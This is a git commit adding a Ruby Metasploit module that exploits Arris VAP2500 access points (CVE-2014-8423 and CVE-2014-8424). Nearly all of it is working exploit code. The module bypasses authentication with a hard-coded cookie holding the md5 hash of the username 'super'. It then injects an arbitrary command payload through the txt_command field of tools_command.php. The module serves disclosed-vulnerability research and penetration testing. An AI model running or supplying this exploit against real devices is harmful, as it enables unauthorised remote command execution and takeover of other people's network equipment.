Add module for Arris VAP2500 Remote Command Execution

headlesszeke · headlesszeke · commit 280e10db55c9 · 2014-12-01T23:07:56.000-06:00
diff --git a/modules/exploits/linux/http/vap2500_tools_command_exec.rb b/modules/exploits/linux/http/vap2500_tools_command_exec.rb
@@ -0,0 +1,102 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Arris VAP2500 tools_command.php Command Execution',
+      'Description' => %q{
+        Arris VAP2500 access points are vulnerable to OS command injection in the web management
+        portal via the tools_command.php page. Though authentication is required to access this
+        page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid
+        username.
+      },
+      'Author'      =>
+        [
+          'HeadlessZeke' # Vulnerability discovery and Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2014-8423'],
+          ['CVE', '2014-8424'],
+          ['OSVDB', '115045'],
+          ['OSVDB', '115046'],
+          ['BID', '71297'],
+          ['BID', '71299'],
+          ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/']
+        ],
+      'DisclosureDate' => 'Nov 25 2014',
+      'Privileged'     => false,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 1024
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [[ 'Automatic', { }]],
+      'DefaultTarget' => 0
+      ))
+  end
+
+  def check
+    begin
+      res = send_request_raw({
+        'method' => 'GET',
+        'uri' => '/tools_command.php',
+        'headers' => {
+          'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")
+          }
+      })
+      if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/
+        return Exploit::CheckCode::Vulnerable
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    uri = '/tools_command.php'
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'vars_post' => {
+          'cmb_header'  => '',
+          'txt_command' => payload.encoded
+        },
+        'method' => 'POST',
+        'headers' => {
+          'Cookie' => "p=1b3231655cebb7a1f783eddf27d254ca", # md5("super")
+          }
+      })
+      if res and res.code == 200 and res.body.to_s =~ /TOOLS - COMMAND/
+        print_good("#{peer} - Command sent successfully")
+      else
+        fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end
